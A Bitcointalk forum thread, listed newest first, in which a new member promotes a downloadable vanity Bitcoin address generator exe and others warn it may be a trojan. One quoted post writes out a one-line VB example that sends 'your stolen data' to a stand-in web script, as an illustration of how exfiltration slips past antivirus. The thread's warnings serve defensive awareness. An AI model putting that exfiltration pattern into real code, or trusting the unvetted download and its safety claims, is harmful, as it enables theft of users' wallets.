Author

Topic: Alternative to: Custom Bitcoin Address Generator (Read 1473 times)

newbie
Activity: 33
Merit: 0
February 15, 2013, 06:39:50 AM
#16
Because all of you trusted the pervious program, I made the security of the following web service much better: http://coinbit.tk

It uses the Elliptic Curve Cryptography.

Have fun with it!
legendary
Activity: 1512
Merit: 1036
As I said earlier, the only way you are going to get anyone to download this, other than to see what you've done bad to get you banned, is to publish the source code and describe the build environment.

You join the forum, and 36 hours later post an exe = scammer.

You tell people to virus scan when anybody knows a trojan horse function won't be caught by one = scammer.

I tell you why we can't trust your exe, you challenge people to try to decompile it instead of posting source = scammer.

You change your OP after being called out for using other people's code without credit = scammer.

You bump your thread, like you haven't gotten the infection level you were hoping for, or the deterministic key balances on the net you were hoping to steal = scammer.
newbie
Activity: 33
Merit: 0

Never ever ever ever ever ever trust virustotal.com to tell you if a program is safe to use or not, virus checkers are not worth the hard drive space or the cpu time they consume.

I'm not suggesting there is anything wrong with his program I'm just wanting people to be aware that virus checkers are totally incapable of spotting software capable of transmitting information over the internet.

It needs .NET Framework so its probably done in Visual Studio.

A VB command that looks like this.

WebBrowser.Navigate("http://somedomain.com/Script.php?" + "your stolen data")

would send the text string "your stolen data" to the php script, virus checkers ignore this and since it goes out on port 80 your firewall treats it as a web browser and ignores it.



As I said earlier, you can decompile the application to make sure it won't communicate with anyone. Try running it with an internet monitor, and you'll see that it's completely safe...
newbie
Activity: 32
Merit: 0

Never ever ever ever ever ever trust virustotal.com to tell you if a program is safe to use or not, virus checkers are not worth the hard drive space or the cpu time they consume.

I'm not suggesting there is anything wrong with his program I'm just wanting people to be aware that virus checkers are totally incapable of spotting software capable of transmitting information over the internet.

It needs .NET Framework so its probably done in Visual Studio.

A VB command that looks like this.

WebBrowser.Navigate("http://somedomain.com/Script.php?" + "your stolen data")

would send the text string "your stolen data" to the php script, virus checkers ignore this and since it goes out on port 80 your firewall treats it as a web browser and ignores it.

newbie
Activity: 33
Merit: 0
Why not just code this as a webpage, and and drop the whole 'download an application' thing?

Many people are not on windows.

I guess I'll start a website then Tongue
newbie
Activity: 33
Merit: 0
You are wanting people to download an exe file. There is no way this can be made safe.

Even with analysis, the thing could lie in wait, only activating it's hidden "send the wallet.dat and wipe the hard drive" feature after a certain date or runtime. The addresses it makes could use less than good randomness or a deterministic seed, meaning it would be possible to easily cryptanalyse a seen vanity address to determine the key. The only way the exe could be close to trustable is if the unobfuscated source code is also published along with build instructions, and others are able to compile a binary-identical executable. Then after someone reviews it and says it's safe, you still only need to update the first post to point to a different file.

Then you are still putting your donation address on something that is 95% another person's work.

Well, there are many .NET code viewers (.NET Reflector, jetbrains,...) to grab the source code of it. You'll need to extract the exe with 7zip/WinRAR tough.
You can check the network connectivity if the application, if you really think that the app will send a wallet.dat to someone.
You can also debug the whole app using ollydbg if you are an expert...
legendary
Activity: 1512
Merit: 1036
You are wanting people to download an exe file. There is no way this can be made safe.

Even with analysis, the thing could lie in wait, only activating it's hidden "send the wallet.dat and wipe the hard drive" feature after a certain date or runtime. The addresses it makes could use less than good randomness or a deterministic seed, meaning it would be possible to easily cryptanalyse a seen vanity address to determine the key. The only way the exe could be close to trustable is if the unobfuscated source code is also published along with build instructions, and others are able to compile a binary-identical executable. Then after someone reviews it and says it's safe, you still only need to update the first post to point to a different file.

Then you are still putting your donation address on something that is 95% another person's work.
newbie
Activity: 33
Merit: 0
Bump
newbie
Activity: 33
Merit: 0

This application crashes before it can run


I created a virtual machine to test the application in XP. You'll need to download the .NET Framework 2.0, otherwise you'll get that error.
OpenCL.dll won't work in VMWare tough. Try to run it in a non-virtualized enviroment.
newbie
Activity: 33
Merit: 0
You could create a java applet of it, but it'll only use the CPU, instead of the GPU.
member
Activity: 105
Merit: 10
Why not just code this as a webpage, and and drop the whole 'download an application' thing?

Many people are not on windows.
newbie
Activity: 33
Merit: 0
Forgot to add sources, thanks for the reminder  Wink

Try to download .NET Framework 2.0 at http://www.microsoft.com/en-us/download/details.aspx?id=1639
legendary
Activity: 1512
Merit: 1036
This application is in violation of the GPL, the license and source code are not included. It uses Samr's vanitygen code.

This application crashes before it can run (or before I can detect bad actions). It extracts and deploys it's payload to a temp directory.

newbie
Activity: 33
Merit: 0
I added a virustotal link. You can check the SHA256 hash before opening it.
hero member
Activity: 742
Merit: 500
Its as easy as 0, 1, 1, 2, 3
Havent downloaded it yet, but everyone be careful when downloading programs to your computers.
newbie
Activity: 33
Merit: 0
Edit: http://coinbit.tk is an online alternative Wink

Hello community!

I've programmed an application where you can generate your own custom address! It is designed for people who preffer a User Interface, instead of a console. It uses the Vanitygen binary as Library https://bitcointalksearch.org/topic/vanitygen-vanity-bitcoin-address-generatorminer-v022-25804
This application is GPU accelerated. AMD GPU's are recommended if you want to generate large addresses.

Screenshot:
https://dl.dropbox.com/u/15267878/Screenshot.JPG

Download link: http://www.mediafire.com/?r0h675nej83ub8e

Virustotal: https://www.virustotal.com/file/cd58e35bc6bec67deb910d1bba8977eeb28b79a57a7f3648f9e3f0388397671a/analysis/

Attention xp users: Download .NET Framework 2.0 at http://www.microsoft.com/en-us/download/details.aspx?id=1639

If you have the OpenCL.dll error, please download the latest drivers from your GPU manufacturer.


Feel free to donate me for my work at 1iLiAn71UdXF2nT1MfUJMZdAjtmj4nidu

If this application won't work, please grab a screenshot and post it into this topic, thanks!
Jump to: